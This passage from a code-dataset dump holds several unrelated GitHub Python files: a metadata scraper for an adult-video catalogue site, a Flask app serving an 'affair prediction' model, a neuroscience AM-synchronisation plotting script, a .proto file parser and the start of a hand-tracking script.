"line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylim", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "3425393519", "text": "import requests\nimport bs4\n\n\ndef encode(url):\n return \"\".join([chr((ord(rune) + 1) % 128) for rune in url])\n\n\nclass Bus:\n ''' Data source -- BUS\n '''\n base_url = encode(\"gssor9..vvv-i`uatr-bnl.\")\n search_prefix = encode(\"rd`qbg.\")\n http_proxy = \"\"\n\n def __init__(self, http_proxy=\"\"):\n self.http_proxy = http_proxy\n\n def Get(self, designatio):\n result = {}\n\n # URL for searching designatio\n URL = self.base_url + self.search_prefix + designatio\n\n # Using requests\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'cookie': 'existmag=all',\n 'referer': 'https://www.javbus.com',\n 'sec-ch-ua': '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"macOS\"',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n }\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n\n # parse html\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n search_result = soup.select(\".item\")\n if search_result is None or len(search_result) == 0:\n # No result\n raise Exception(\"Not recruited\")\n\n # multiple result - choose the correct one\n matched = []\n for r in search_result:\n id = r.find(\"date\").string\n if id == designatio:\n title = r.find(\"img\").attrs[\"title\"]\n matched.append((id + \" \" + title, r.find(\"a\").attrs[\"href\"]))\n\n idx = 0\n if len(matched) > 1:\n print(\"Multiple Choice:\")\n for i in range(0, len(matched)):\n print(\" [%d] %s\" % (i, matched[i][0]))\n idx = int(input(\"\\nSelect > \"))\n URL = matched[idx][1]\n\n # get info\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n # search title\n result[\"title\"] = soup.select_one(\"body > .container > h3\").string\n\n # cover image\n cover_url = soup.select_one(\".bigImage\")[\"href\"]\n if cover_url.startswith('/'):\n cover_url = self.base_url + cover_url\n 
result[\"cover_url\"] = cover_url\n\n # outline \n try:\n airav_URL = encode(\"gssor9..vvv-`hq`u-vhjh.uhcdn.\") + designatio\n outline_rep = requests.get(\n airav_URL, proxies={\"http\": self.http_proxy}, headers=headers)\n airav_soup = bs4.BeautifulSoup(\n outline_rep.content, features=\"html.parser\")\n result[\"outline\"] = airav_soup.select_one(\".synopsis > p\").string\n except:\n pass\n\n # infomation\n attributes = [e.string for e in soup.select(\".header\")]\n include = {\n \"designatio\": '識別碼:' in attributes,\n \"date\": '發行日期:' in attributes,\n \"length\": '長度:' in attributes,\n \"director\": '導演:' in attributes,\n \"maker\": '製作商:' in attributes,\n \"label\": '發行商:' in attributes,\n \"series\": '系列:' in attributes,\n \"genres\": '類別:' in attributes,\n \"cast\": '演員' in attributes,\n }\n\n # Attributes Extract lambda function\n extract = {\n \"designatio\": lambda soup, i: i.select(\"span\")[1].string,\n \"date\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"

\"),\n \"length\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"

\").strip().rstrip(\"分鐘\"),\n \"director\": lambda soup, i: i.a.string,\n \"maker\": lambda soup, i: i.a.string,\n \"label\": lambda soup, i: i.a.string,\n \"series\": lambda soup, i: i.a.string,\n \"genres\": lambda soup, i: [genre.string for genre in soup.select('a[href^=\"https://www.javbus.com/genre/\"]')][2:],\n \"cast\": lambda soup, i: [actor.a.string for actor in soup.select('span[onmouseout^=\"hoverdiv\"]')],\n }\n\n info = soup.select(\".info > p\")\n idx = 0\n\n for attr in [\"designatio\", \"date\", \"length\", \"director\", \"maker\", \"label\", \"series\", \"genres\", \"cast\"]:\n if include[attr]:\n result[attr] = extract[attr](soup, info[idx])\n idx += 1\n return result\n", "repo_name": "Lqlsoftware/avutil", "sub_path": "avutil/source/bus.py", "file_name": "bus.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "8506577518", "text": "from wsgiref import simple_server\r\nfrom flask import Flask, request, app,render_template\r\nfrom flask import Response\r\nfrom flask_cors import CORS\r\nfrom logistic_deploy import predObj\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\napp.config['DEBUG'] = True\r\n\r\n\r\nclass ClientApi:\r\n\r\n def __init__(self):\r\n self.predObj = predObj()\r\n\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\ndef predictRoute():\r\n try:\r\n rateMarriage=int(request.form['rateMarriage'])\r\n age = int(request.form['age'])\r\n yearsMarried = int(request.form['yearsMarried'])\r\n children = int(request.form['children'])\r\n education = int(request.form['education'])\r\n occupation = int(request.form['occupation'])\r\n husbandOccupation = int(request.form['husbandOccupation'])\r\n religious = int(request.form['religious'])\r\n occ_2 = 0\r\n occ_3=0\r\n occ_4=0\r\n occ_5=0\r\n occ_6=0\r\n occ_husb_2=0\r\n occ_husb_3=0\r\n occ_husb_4=0\r\n occ_husb_5=0\r\n occ_husb_6=0\r\n if occupation == 2:\r\n occ_2 = 1\r\n elif occupation == 3:\r\n occ_3 = 1\r\n elif occupation == 4:\r\n occ_4 = 1\r\n elif occupation == 5:\r\n occ_5 = 1\r\n elif occ_6 == 6:\r\n occ_6 = 1\r\n else:\r\n print(occupation)\r\n \r\n if husbandOccupation == 2:\r\n occ_husb_2 = 1\r\n elif husbandOccupation == 3:\r\n occ_husb_3 = 1\r\n elif husbandOccupation == 4:\r\n occ_husb_4 = 1\r\n elif husbandOccupation == 5:\r\n occ_husb_5 = 1\r\n elif husbandOccupation == 6:\r\n occ_husb_6 = 1\r\n else:\r\n print(husbandOccupation)\r\n data = [[1,occ_2,occ_3,occ_4,occ_5,occ_6,occ_husb_2,occ_husb_3,occ_husb_4,occ_husb_5,occ_husb_6,rateMarriage,age,yearsMarried,children,religious,education]]\r\n print('data is: ', data)\r\n pred=predObj()\r\n res = pred.predict_log(data)\r\n\r\n print('result is ',res)\r\n return render_template('result.html', prediction_text='{}'.format(res))\r\n except ValueError:\r\n return Response(\"Value not found\")\r\n except Exception as e:\r\n print('exception is ',e)\r\n return Response(e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
clntApp = ClientApi()\r\n #host = '0.0.0.0'\r\n #port = 5000\r\n app.run(debug=True)", "repo_name": "tejasjbansal/Woman-Affair-Prediction", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.app", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask.app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "flask.app", "line_number": 9, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.app.run", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "38276237285", "text": "from matplotlib import pyplot as plt\nfrom collections import Counter\nfrom jaratest.nick.stats import am_funcs\nreload(am_funcs)\nimport pandas\nimport numpy as np\nfrom jaratoolbox import colorpalette\nfrom jaratoolbox import extraplots\nimport matplotlib\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nimport matplotlib.pyplot as plt\n# import seaborn\n\n\nthaldbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/thalamusdb_q10.pickle'\ncortdbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/cortexdb_q10.pickle'\nthaldb = pandas.read_pickle(thaldbfn)\ncortdb = 
pandas.read_pickle(cortdbfn)\n\nlaserTrainThresh = 1.5\nnoiseBurstThresh = 2\nisiThresh = 4\n\nthalNonID = thaldb[(thaldb['isiViolations']noiseBurstThresh) & (thaldb['lasertrainZ']noiseBurstThresh) & (cortdb['lasertrainZ']noiseBurstThresh) & (thaldb['lasertrainZ']>laserTrainThresh)]\ncortID = cortdb[(cortdb['isiViolations']noiseBurstThresh) & (cortdb['lasertrainZ']>laserTrainThresh)]\n\nthalamHSNonID = thalNonID['highestSync']\ncortamHSNonID = cortNonID['highestSync']\n\nthalamHSID = thalID['highestSync']\ncortamHSID = cortID['highestSync']\n\n\n\n# Percentage of neurons that sync to the freqs we tested\nlowFreq = 4\nhighFreq = 128\nnFreqs = 11\nfreqs = np.logspace(np.log10(lowFreq),np.log10(highFreq),nFreqs)\nfreqs = np.round(freqs, decimals=1)\nfreqs = np.r_[0, freqs]\n\nthalHighestNonID = np.round(thalamHSNonID.dropna(), decimals=1)\nthalHighestID = np.round(thalamHSID.dropna(), decimals=1)\nnThal = len(thalHighestNonID) + len(thalHighestID)\n\ncortHighestNonID = np.round(cortamHSNonID.dropna(), decimals=1)\ncortHighestID = np.round(cortamHSID.dropna(), decimals=1)\nnCort = len(cortHighestNonID) + len(cortHighestID)\n\nthalCounterNonID = Counter(thalHighestNonID)\nthalCounterID = Counter(thalHighestID)\n\ncortCounterNonID = Counter(cortHighestNonID)\ncortCounterID = Counter(cortHighestID)\n\nthalcountsNonID = [100*thalCounterNonID[freq]/np.double(nThal) for freq in freqs]\nthalcountsID = [100*thalCounterID[freq]/np.double(nThal) for freq in freqs]\n\ncortcountsNonID = [100*cortCounterNonID[freq]/np.double(nCort) for freq in freqs]\ncortcountsID = [100*cortCounterID[freq]/np.double(nCort) for freq in freqs]\n\nindex = np.arange(len(freqs))\nbar_width=0.35\nplt.clf()\nfig = plt.gcf()\nfig.set_size_inches(10.5, 3.7)\nlinewidth=2\nfontsize=20\n\nrects11 = plt.bar(index,\n thalcountsID,\n bar_width,\n label='Tagged thalamo-striatal',\n facecolor=colorpalette.TangoPalette['Orange2'],\n edgecolor=colorpalette.TangoPalette['Orange2'],\n linewidth = linewidth)\n\nrects12 = plt.bar(index,\n thalcountsNonID,\n bar_width,\n label='Thalamus, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Orange2'],\n bottom=thalcountsID,\n linewidth=linewidth)\n\nrects21 = plt.bar(index+bar_width+0.04,\n cortcountsID,\n bar_width,\n label='Tagged cortico-striatal',\n facecolor=colorpalette.TangoPalette['Plum2'],\n edgecolor=colorpalette.TangoPalette['Plum2'],\n linewidth=linewidth)\n\nrects22 = plt.bar(index+bar_width+0.04,\n cortcountsNonID,\n bar_width,\n label='Cortex, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Plum2'],\n bottom=cortcountsID,\n linewidth=linewidth)\n\nplt.xlabel('Maximum AM rate to which responses\\nwere synchronized (Hz)', fontsize=fontsize)\nplt.ylabel('% Neurons', fontsize=fontsize)\n# plt.title('Scores by group and gender')\nplt.xticks(index + bar_width, freqs)\nplt.legend(loc='upper left', prop={'size':15})\nplt.tight_layout()\nax = plt.gca()\nax.set_yticks(np.linspace(0, 40, 5))\nextraplots.set_ticks_fontsize(ax, fontsize)\nextraplots.boxoff(ax)\n\nplt.show()\n\n# Dependence of mean FR on AM rate\n# thalamR = thalCells['amRval']\n# cortamR = cortCells['amRval']\n# plt.clf()\n# plt.plot(np.random.normal(1, 0.05, len(thalamR.dropna())), thalamR.dropna(), '.', ms=10)\n# plt.hold(True)\n# plt.plot(np.random.normal(3, 0.05, len(cortamR.dropna())), cortamR.dropna(), '.', ms=10)\n# plt.xlim([0.5, 3.5])\n# ax = plt.gca()\n# ax.set_xticks([1, 3])\n# ax.set_xticklabels(['Thalamus', 'Cortex'])\n# plt.ylabel('Correlation coefficient between\\nfiring rate 
and AM rate')\n# plt.show()\n\n### EXAMPLE NEURON HUNT\n# corrCells = thalCells[np.abs(thalCells['amRval'])>0.5]\n# corrCells = cortCells[np.abs(cortCells['amRval'])>0.5]\n\n# for indCell, cell in corrCells.iterrows():\n# plt.clf()\n# try:\n# sessiontypeIndex = cell['sessiontype'].index('AM')\n# except ValueError: #The cell does not have this session type\n# continue\n# print indCell\n# # r_val, frArray = am_funcs.am_dependence(cell, frArray=True)\n# # plt.plot(frArray)\n# # plt.waitforbuttonpress()\n# plt.subplot(3, 1, 1)\n# am_funcs.plot_am_raster(cell)\n# plt.subplot(3, 1, 2)\n# am_funcs.plot_am_psth(cell)\n# plt.subplot(3, 1, 3)\n# r_val, frArray, possibleFreq = am_funcs.am_dependence(cell, frArray=True)\n# plt.plot(frArray)\n# ax = plt.gca()\n# ax.set_xticks(np.arange(len(possibleFreq)))\n# ax.set_xticklabels(np.round(possibleFreq, decimals=1))\n# plt.xlabel(r_val)\n# plt.waitforbuttonpress()\n", "repo_name": "sjara/jaratest", "sub_path": "nick/analysis/poster_ephys/am_stats_plot.py", "file_name": "am_stats_plot.py", "file_ext": "py", "file_size_in_byte": 5693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "jaratest.nick.stats.am_funcs", "line_number": 4, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 78, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 78, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 79, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", 
"line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 87, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 95, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 95, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 104, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 115, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots.set_ticks_fontsize", "line_number": 116, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 116, "usage_type": "name"}, {"api_name": "jaratoolbox.extraplots.boxoff", "line_number": 117, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "36766905246", "text": "import logging\n\nlog = logging.getLogger(__name__)\n\n\nclass ProtoParser:\n def __init__(self, filename):\n with open(filename, 'r') as f:\n data = f.read()\n\n lines = data.split('\\n')\n tokens = []\n for line in lines:\n if line.startswith('//'):\n continue\n\n if line.startswith('syntax'):\n continue\n\n if line.startswith('option'):\n continue\n\n line = line.replace('\\t', ' ')\n tokens.extend(line.split(' '))\n\n self.tokens = []\n for t in tokens:\n if t not in ('', ' '):\n self.tokens.append(t)\n\n self.nested_message = []\n self.path = dict()\n self.old = dict()\n self.type_order = dict()\n self.type_array = []\n self.messages = []\n self.pos = 0\n\n def next(self):\n self.pos += 1\n return 
self.token()\n\n def token(self):\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n return None\n\n def has_tokens(self):\n return self.pos < len(self.tokens)\n\n def parse(self):\n while self.has_tokens():\n tok = self.token()\n\n if tok == 'message':\n self.parse_message()\n\n elif tok == 'enum':\n self.parse_enum()\n\n else:\n print(f'dont know how to parse `{tok}`')\n\n def parse_oneof(self):\n self.expect('oneof')\n name = self.next()\n\n self.next(), self.expect('{')\n fields = []\n\n tok = self.next()\n while tok != '}':\n fields.append(self.parse_field())\n tok = self.token()\n\n self.expect('}'), self.next()\n\n print(name, name in self.type_order)\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n self.messages.append(('O', name, fields))\n\n fname = name[0].lower() + name[1:]\n return 'F', 0, fname, name, ''\n\n def parse_field(self):\n qualifier = ''\n tok = self.token()\n\n if tok in ('optional', 'required', 'repeated'):\n qualifier = tok\n field_type = self.next() \n elif tok == 'oneof':\n return self.parse_oneof()\n else:\n field_type = tok\n \n field_name = self.next()\n\n self.next(), self.expect('=')\n field_id = self.next() \n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n # start of the [default ....]; stuff\n elif tok[0] == '[':\n tok = self.token()\n while tok[-1] != ';':\n tok = self.next()\n self.next()\n\n elif field_id[-1] == ';':\n field_id = field_id[:-1]\n\n new_name = field_type.split('.')[-1]\n if new_name not in self.type_order:\n self.type_order[new_name] = len(self.type_order)\n self.type_array.append(new_name)\n \n log.debug(f'parse field {qualifier} {field_name}: {field_type} = {field_id}')\n return 'F', field_id, field_name, field_type, qualifier\n\n def parse_enum_field(self):\n name = self.token()\n self.next(), self.expect('=')\n value = self.next()\n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n elif value[-1] == ';':\n value = value[:-1]\n\n return name, value\n\n def expect(self, c):\n t = self.token()\n assert t == c, f'Expected `{c}` got `{t}`'\n\n def parse_enum(self):\n self.expect('enum')\n name = self.next()\n\n log.debug(f'>> parsing enum {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n tok = self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n fname, fvalue = self.parse_enum_field()\n fields.append((fname, fvalue))\n tok = self.token()\n\n self.expect('}'), self.next()\n self.messages.append(('E', name, fields))\n self.nested_message.pop()\n\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n def parse_message(self):\n self.expect('message')\n name = self.next()\n\n log.debug(f'>> parsing message {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' 
+ '.'.join(self.nested_message)\n\n self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n if tok == 'message':\n self.parse_message()\n tok = self.token()\n continue\n\n if tok == 'enum':\n self.parse_enum()\n tok = self.token()\n continue\n\n fields.append(self.parse_field())\n tok = self.token()\n \n self.expect('}'), self.next()\n self.nested_message.pop()\n self.messages.append(('M', name, fields))\n \n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n p = ProtoParser('C:/Users/Newton/work/luafun/luafun/game/dota2/dota_gcmessages_common_bot_script.proto')\n p.parse()\n print(p.messages)\n", "repo_name": "Delaunay/dota2env", "sub_path": "luafun/utils/proto_parser.py", "file_name": "proto_parser.py", "file_ext": "py", "file_size_in_byte": 5757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 213, "usage_type": "attribute"}]} +{"seq_id": "30612429975", "text": "# Source :\r\n# https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data\r\n# https://github.com/nicknochnack/YOLO-Drowsiness-Detection/blob/main/Drowsiness%20Detection%20Tutorial.ipynb\r\n# https://github.com/tzutalin/labelImg\r\n\r\n\r\n# Label Image - \"myhand\" environment\r\n# -----------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\labelImg\r\n# python labelImg.py\r\n\r\n# YoLoV5 Training - \"mybrain\" environment\r\n# ---------------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\r\n# python train.py --img 320 --batch 16 --epochs 100 --data dataset.yaml --weights yolov5s.pt --workers 2\r\n\r\n\r\n#Install and Import Dependencies\r\n\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport math\r\nimport time\r\n\r\n# Create CSV file\r\nimport csv\r\n\r\nheader_ang = [ 'timer', 'timer_task', \r\n 'angle01', 'angle02', 'angle03', \r\n 'angle11', 'angle12', 'angle13',\r\n 'angle21', 'angle22', 'angle23', \r\n 'angle31', 'angle32', 'angle33',\r\n 'angle41', 'angle42', 'angle43', 'task_state', 'thumb_state', ] \r\n \r\ncsvfile_ang = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_angle.csv', 'w')\r\nwriter_ang = csv.writer(csvfile_ang, delimiter = ',', lineterminator='\\n')\r\nwriter_ang.writerow(header_ang)\r\n\r\nheader_sta = [ 'timer', 'timer_task', 'grasp_type', 'rotate_type', 'box_near_hand'] \r\n \r\ncsvfile_sta = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_status.csv', 'w')\r\nwriter_sta = csv.writer(csvfile_sta, delimiter = ',', lineterminator='\\n')\r\nwriter_sta.writerow(header_sta)\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP Graph Neural Networks\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn import Linear\r\n\r\ndataset_num_node_features = 1\r\ndataset_num_classes = 7\r\n\r\n# Training with GCNConv\r\nfrom torch_geometric.data import Data\r\n\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import global_mean_pool\r\n\r\n\"\"\"\"\"\"\r\nclass GCN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GCN, 
